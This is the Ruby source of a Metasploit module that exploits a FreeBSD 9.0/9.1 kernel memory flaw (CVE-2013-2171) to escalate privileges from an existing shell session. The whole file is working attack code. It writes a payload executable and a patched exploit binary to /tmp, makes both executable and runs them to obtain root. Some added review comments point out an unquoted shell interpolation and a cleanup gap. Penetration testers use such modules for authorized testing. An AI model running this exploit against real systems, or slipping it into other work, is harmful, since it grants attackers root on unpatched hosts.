GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/freebsd/local/mmap.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
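# Local privilege-escalation module for the FreeBSD address-space
# manipulation flaw tracked as CVE-2013-2171 (see the FreeBSD-SA-13:06.mmap
# advisory listed under 'References' for the vendor fix).
#
# What the module leaves on the target, as visible in this file:
#   * a payload executable named with four random letters inside WritableDir
#     (default /tmp);
#   * a second executable, also named with four random letters, always under
#     /tmp regardless of WritableDir;
#   * both are made executable with `chmod +x` through the existing shell
#     session and are registered with FileDropper for removal.
class MetasploitModule < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Exploit::FileDropper

  # Marker inside data/exploits/CVE-2013-2171.bin that generate_exploit
  # overwrites with the payload path. The replacement is padded to the
  # marker's length so the size of the template does not change.
  PAYLOAD_PATH_MARKER = 'MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890'.freeze

  # Number of random letters used for each dropped file name.
  RANDOM_NAME_LENGTH = 4

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FreeBSD 9 Address Space Manipulation Privilege Escalation',
        'Description' => %q{
          This module exploits a vulnerability that can be used to modify portions of
          a process's address space, which may lead to privilege escalation. Systems
          such as FreeBSD 9.0 and 9.1 are known to be vulnerable.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Konstantin Belousov', # Discovery
          'Alan Cox', # Discovery
          'Hunger', # POC
          'sinn3r' # Metasploit
        ],
        'Platform' => [ 'bsd' ],
        'Arch' => [ ARCH_X86 ],
        'SessionTypes' => [ 'shell' ],
        'References' => [
          [ 'CVE', '2013-2171' ],
          [ 'OSVDB', '94414' ],
          [ 'EDB', '26368' ],
          [ 'BID', '60615' ],
          [ 'URL', 'http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc' ]
        ],
        'Targets' => [
          [ 'FreeBSD x86', {} ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2013-06-18',
        'Notes' => {
          'Stability' => [ CRASH_SAFE, ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
          'Reliability' => [ REPEATABLE_SESSION, ]
        }
      )
    )
    register_options([
      # It isn't OptPath because it's a *remote* path
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
    ])
  end

  # Banner-only check: matches the `uname -a` output of the session against
  # "FreeBSD 9.0" / "FreeBSD 9.1". Patch level is not inspected, so a host
  # that still reports a 9.0/9.1 release string after applying the advisory's
  # fix may also be reported as Appears.
  #
  # @return [Exploit::CheckCode] Appears on a version match, Safe otherwise
  def check
    res = cmd_exec('uname -a')
    return Exploit::CheckCode::Appears if res.to_s.match?(/FreeBSD 9\.[01]/)

    Exploit::CheckCode::Safe
  end

  # Writes the generated payload executable into WritableDir under a random
  # four-letter name and marks it executable.
  #
  # The full path has to fit in the PAYLOAD_PATH_MARKER field of the template
  # binary, so the directory (with its trailing slash) is limited to the
  # marker length minus the random name length.
  # NOTE(review): a path of exactly the marker length is padded with no NUL
  # byte; this assumes the template tolerates that - confirm against the
  # binary.
  #
  # @return [String, nil] remote path of the payload, or nil if the file is
  #   not present after the write
  def upload_payload
    dir = datastore['WritableDir']
    dir = "#{dir}/" unless dir.end_with?('/')

    max_dir_length = PAYLOAD_PATH_MARKER.length - RANDOM_NAME_LENGTH
    if dir.length > max_dir_length
      # The previous message quoted 33 characters while the check enforced 36;
      # the limit is now reported from the value that is actually enforced.
      fail_with(
        Failure::BadConfig,
        "WritableDir can't be longer than #{max_dir_length} characters (including the trailing slash)"
      )
    end

    fname = "#{dir}#{Rex::Text.rand_text_alpha(RANDOM_NAME_LENGTH)}"

    write_file(fname, generate_payload_exe)
    return unless file_exist?(fname)

    # NOTE(review): fname is interpolated into the shell command unquoted, and
    # WritableDir is only length-checked; whitespace or shell metacharacters
    # in that option would change the command that runs on the session.
    cmd_exec("chmod +x #{fname}")
    fname
  end

  # Loads the prebuilt template binary from the framework data directory and
  # substitutes the payload path for PAYLOAD_PATH_MARKER, NUL-padded to the
  # marker's length.
  #
  # @param payload_fname [String] remote path of the uploaded payload
  # @return [String] binary contents of the patched template
  def generate_exploit(payload_fname)
    #
    # Metasm does not support FreeBSD executable generation.
    #
    path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2013-2171.bin')
    template = File.binread(path)
    padded_path = payload_fname.ljust(PAYLOAD_PATH_MARKER.length, "\x00")

    # Block form inserts the path literally; a plain replacement string would
    # have any backslash sequences in the path treated as back-references.
    template.gsub(PAYLOAD_PATH_MARKER) { padded_path }
  end

  # Writes the patched template binary to the target and marks it executable.
  # The file is always placed under /tmp; WritableDir is not consulted here.
  #
  # @param payload_fname [String] remote path of the uploaded payload
  # @return [String, nil] remote path of the binary, or nil if the file is
  #   not present after the write
  def upload_exploit(payload_fname)
    fname = "/tmp/#{Rex::Text.rand_text_alpha(RANDOM_NAME_LENGTH)}"
    write_file(fname, generate_exploit(payload_fname))
    return unless file_exist?(fname)

    cmd_exec("chmod +x #{fname}")
    fname
  end

  # Uploads the payload, uploads the patched template that references it,
  # registers both files for cleanup and then runs the template binary
  # through the session.
  #
  # NOTE(review): cleanup is registered only after both uploads have
  # succeeded, so when the second upload fails the first file has not been
  # registered for removal at the point fail_with aborts the run.
  def exploit
    payload_fname = upload_payload
    fail_with(Failure::NotFound, 'Payload failed to upload') if payload_fname.nil?
    print_status("Payload #{payload_fname} uploaded.")

    exploit_fname = upload_exploit(payload_fname)
    fail_with(Failure::NotFound, 'Exploit failed to upload') if exploit_fname.nil?
    print_status("Exploit #{exploit_fname} uploaded.")

    register_files_for_cleanup(payload_fname, exploit_fname)

    print_status("Executing #{exploit_fname}")
    cmd_exec(exploit_fname)
  end
end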